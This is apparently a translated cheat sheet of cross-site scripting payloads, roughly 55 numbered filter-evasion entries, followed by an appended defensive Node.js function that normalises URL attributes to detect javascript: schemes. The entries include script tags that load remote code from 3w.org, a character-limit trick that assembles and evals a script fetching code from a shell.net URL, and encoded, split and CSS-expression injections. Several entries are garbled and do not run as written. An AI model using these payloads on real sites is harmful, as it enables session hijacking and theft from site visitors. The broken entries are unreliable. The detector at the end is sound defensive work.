(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative popups
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolon required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective in China, because there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (consists of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
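Entries (3)-(5), (7)-(14), (17), (19) and (40) above are all spellings of one thing, a script-scheme URL in an attribute, so a filter that compares the raw string misses most of them. As an added defensive example, not part of the original cheat sheet, this Node.js check normalises the value the way a browser does (optional-semicolon entity decoding, removal of tab, LF, CR, NUL and leading control characters, case folding) before looking at the scheme; the function names and the sample inputs are my own constructions.

```javascript
// Added defensive example, not part of the original cheat sheet: normalise an
// attribute value the way a browser's URL parser does before checking for a
// script scheme, so the obfuscation families listed above collapse to one form.
const SCRIPT_SCHEMES = ["javascript:", "vbscript:"];
const NAMED = { lt: "<", gt: ">", quot: '"', amp: "&", apos: "'" };
// Numeric character references: the semicolon is optional, which is what the
// "no semicolon" entries above rely on. Out-of-range values become U+FFFD.
function fromCode(n) {
  return n > 0x10ffff ? "\uFFFD" : String.fromCodePoint(n);
}
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&(lt|gt|quot|amp|apos);/gi, (_, n) => NAMED[n.toLowerCase()]);
}
// Mirror the URL standard: strip leading/trailing C0 controls and space, then
// drop tab, LF and CR anywhere. Old browsers also tolerated a NUL inside the
// scheme, so it is removed too; erring toward rejection is the safe direction.
function normaliseUrl(s) {
  return decodeEntities(s)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r\u0000]/g, "")
    .toLowerCase();
}
function isScriptUrl(attrValue) {
  const url = normaliseUrl(attrValue);
  return SCRIPT_SCHEMES.some((scheme) => url.startsWith(scheme));
}
// Constructed samples (not the page's own payloads), one per family above.
const SAMPLES = {
  mixedCase: "JaVaScRiPt:alert(1)",
  decimalEntities: "&#106;&#97;&#118;&#97;script:alert(1)",
  decimalNoSemicolon: "&#106&#97&#118&#97script:alert(1)",
  hexNoSemicolon: "&#x6A&#x61&#x76&#x61script:alert(1)",
  embeddedTab: "jav\tascript:alert(1)",
  embeddedNewline: "jav\r\nascript:alert(1)",
  nulByte: "java\u0000script:alert(1)",
  leadingControl: "\u000e javascript:alert(1)",
  vbscript: "VBScript:MsgBox(1)",
  benignRemote: "https://example.com/xss.js",
  benignPath: "/java/script/index.html",
};
// Returns { sampleName: flagged } so the result can be checked without output.
function classifySamples() {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([name, v]) => [name, isScriptUrl(v)])
  );
}
```

The same normalisation belongs in front of any allow-list of URL schemes; matching on the raw attribute string is what every obfuscated entry above is designed to get past.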